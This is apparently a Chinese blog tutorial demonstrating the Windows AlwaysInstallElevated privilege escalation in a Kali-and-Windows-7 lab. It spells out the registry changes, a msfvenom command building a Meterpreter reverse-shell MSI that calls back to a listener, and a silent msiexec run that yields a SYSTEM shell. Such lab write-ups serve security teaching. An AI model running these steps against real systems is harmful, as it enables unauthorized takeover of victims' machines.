环境:kali
Win7
1.打开win7先进行注册表的修改
命令:reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
操作成功
2.查询注册表
命令:reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\windows\Installer
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\windows\Installer
修改成功
3.通过PowerSploit反弹shell,前面文章有介绍过
4.制作msi文件
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.188.128 lport=33334 -f msi > /root/dong.msi
5.通过第一个监听获得的shell进行下载msi
命令:upload /root/dong.msi
6.再次开启一个监听,设置如下
7.在win7中命令行中输入命令执行下载好的msi文件(可以在第一个监听中进行shell输入)
命令:msiexec /quiet /qn /i dong.msi
可以看到成功监听,且权限为system
AlwaysInstallElevated提权演示
最新推荐文章于 2024-10-04 21:24:18 发布